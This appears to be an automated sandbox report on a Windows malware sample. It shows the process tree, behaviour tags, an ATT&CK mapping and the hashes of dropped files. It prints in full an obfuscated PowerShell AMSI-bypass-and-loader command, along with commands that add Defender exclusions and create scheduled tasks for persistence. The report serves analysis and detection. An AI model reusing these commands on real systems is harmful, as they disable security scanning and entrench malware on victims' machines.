C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DkvrtYzMINMC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CofLyMqMdsgoFI,[Parameter(Position=1)][Type]$WLktYNWdvy)$qXksweqzRwM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'el'+'e'+''+[Char](103)+'at'+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+',Pub'+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'Ans'+'i'+''+'C'+'las'+[Char](115)+','+[Char](65)+''+'u'+'to'+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$qXksweqzRwM.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+'e'+'B'+[Char](121)+''+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CofLyMqMdsgoFI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+',Man'+[Char](97)+''+'g'+''+'e'+''+'d'+'');$qXksweqzRwM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+'c'+''+','+'Hid'+'e'+''+[Char](66)+''+'y'+'S'+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+'i'+'r'+[Char](116)+''+'u'+''+[Char](97)+'l',$WLktYNWdvy,$CofLyMqMdsgoFI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $qXksweqzRwM.CreateType();}$ldCoZlNiHedJv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+'tem'+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+'M'+''+'i'+'cr'+[Char](111)+''+'s'+'o'+[Char](102)+'t'+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+'3'+''+'2'+'.U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'th'+[Char](111)+'d'+[Char](115)+'');$MLDkvhWLBHdWsR=$ldCoZlNiHedJv.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$huHavpRrIQjpmNhIqBs=DkvrtYzMINMC @([String])([IntPtr]);$yVlwQSqBSRsdECWQEdAVcQ=DkvrtYzMINMC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ynJZzkflQPe=$ldCoZlNiHedJv.GetMethod('G'+'e'+'t'+[Char](77)+''+'o'+''+[Char](100)+'ul'+[Char](101)+''+'H'+''+'a'+'ndl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'nel3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$XiRCvkVWzvwGhn=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$ynJZzkflQPe,[Object](''+'L'+''+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+'a'+'r'+''+[Char](121)+''+'A'+'')));$SHagYkbMlGciWpBLB=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$ynJZzkflQPe,[Object](''+'V'+'i'+[Char](114)+''+'t'+''+[Char](117)+'al'+'P'+''+[Char](114)+'ot'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$IeJQJWs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XiRCvkVWzvwGhn,$huHavpRrIQjpmNhIqBs).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+'i.dl'+'l'+'');$JllDsCdyNUFVDEUNm=$MLDkvhWLBHdWsR.Invoke($Null,@([Object]$IeJQJWs,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+'f'+'e'+''+[Char](114)+'')));$nZRFSAoSkO=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHagYkbMlGciWpBLB,$yVlwQSqBSRsdECWQEdAVcQ).Invoke($JllDsCdyNUFVDEUNm,[uint32]8,4,[ref]$nZRFSAoSkO);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$JllDsCdyNUFVDEUNm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SHagYkbMlGciWpBLB,$yVlwQSqBSRsdECWQEdAVcQ).Invoke($JllDsCdyNUFVDEUNm,[uint32]8,0x20,[ref]$nZRFSAoSkO);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'w'+''+[Char](119)+'w'+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2632
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1336
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2620
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1492
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1712
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1408
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2196
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2224
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2800
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2828
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2840
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2980
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3288
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428 -
C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe"C:\Users\Admin\AppData\Local\Temp\ME77ZTVpfPe1.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionExtension '.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\Powershell.exeC:\Users\Admin\AppData\Local\Temp/Powershell.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.msedge" /SC ONLOGON /TR "C:\Windows\Fonts\www.msedge.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3616
-
-
C:\Windows\Fonts\www.msedge.exe"C:\Windows\Fonts\www.msedge.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.msedge.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.msedge.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2040
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.MsEgeServ.com'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3264
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "www.MsEgeServ" /tr "C:\Users\Admin\AppData\Local\Temp\www.MsEgeServ.com"5⤵
- Scheduled Task/Job: Scheduled Task
PID:4528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1832
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:400
-
-
C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe"C:\Windows\Fonts\www.DeadSec0000000000-obfusecator.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Users\Admin\AppData\Local\Temp\REHQDPN.exeC:\Users\Admin\AppData\Local\Temp\REHQDPN.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1692 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1fc7190a.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:4056 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4500
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3560
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3756
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1136
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3636
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1180
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4828
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3624
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2056
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4004
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3088
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3132
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:4396
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:2596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:2880
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:4512
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
4B
MD5d3b07384d113edec49eaa6238ad5ff00
SHA1f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA5120cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
Filesize
944B
MD515dde0683cd1ca19785d7262f554ba93
SHA1d039c577e438546d10ac64837b05da480d06bf69
SHA256d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA51257c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672
-
Filesize
18KB
MD5cbc70d02652c1829b009be317a2455d0
SHA16f3ace327fc63e28a936c2cd36f387dce53277ae
SHA2561165b728850ad44eb9270b12b4227f764b5278c1809cf606025897804251cf43
SHA5120e6dd3b5f7a8c8388fd59ccf5aac5317d9785b08f2efed4d326e4b96e6c401bc74c5cf267442599eac684dcf801be85ac2703652e04e2745ad6ff00c398115b7
-
Filesize
944B
MD50256bd284691ed0fc502ef3c8a7e58dc
SHA1dcdf69dc8ca8bf068f65d20ef1563bbe283e2413
SHA256e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf
SHA512c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42
-
Filesize
944B
MD5ce4540390cc4841c8973eb5a3e9f4f7d
SHA12293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA5122a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b
-
Filesize
189B
MD57fc49575881a7fc87ec9cc732b433b40
SHA1f936ced883b9660bc29f97353817e8df52453a0a
SHA2560405dda870d3c50a2134e9c9264e91711143665610d64c5a95c416f502d6a115
SHA5125ae9d57e1818b73b0e45860da70dbb20e6cda02d028f2a63c2e03c4b159d99367e727b021d2f7db7388eee837e934bde535bf82106b43e81ac9d8b9cb6313edc
-
Filesize
4B
MD520879c987e2f9a916e578386d499f629
SHA1c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA2569f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f
-
Filesize
290KB
MD5c2bc8ea45567e1a6848b01a7aa7d1a1e
SHA17f2d331f8ff4a7a4e569269a1e566ed34c50b7e2
SHA256738fc90cbb78c29ea1a17c4e5b3321242358cfaa996121ee952520baba2ca559
SHA512b56097ab9be3ba6c6842e58d7fcbc8057d9a1ce09af616650cfbf4d542be5a96909dd4c59932c4ca3fd7eac6100d152065be580e1a8ae08f30ca2a9f62a1261a
-
Filesize
15KB
MD556b2c3810dba2e939a8bb9fa36d3cf96
SHA199ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA2564354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA51227812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
181KB
MD5e75066cf57d49eba53fc4a093efec94c
SHA19bcf21bf5de90c60fbb21434a996e05b38d44d2a
SHA256c22ca82f580854c3dc70e56392f94e4fdd95252ac326fb8606b59166b2a2a975
SHA5128e092812b79659f28f8a8d9a403ddf36b0941cc8e014982c20f0d8529e1d69a87265b3d3abea6f8eb6cd0d1ae029ca02f51ff5610ca8fb36e8962aee51726a39
-
Filesize
73KB
MD5d3ed9a40bf4bc9b44e86182b3583ab1c
SHA13f65ae8dee550e1688a0cef35366b623eb9c5f4a
SHA256ad08d7967ddba5fe4a250a41a7e3766fdfad49a604a70411429219910cfa1ade
SHA512465db3c7c4d8cf6a75cdacc14f801b7dbb292b70fefb3df6e8586d4dae3f2de625ddd3d13830634b3120cfe37279a3ff0e75322808706e42146c9e2e4d22d93c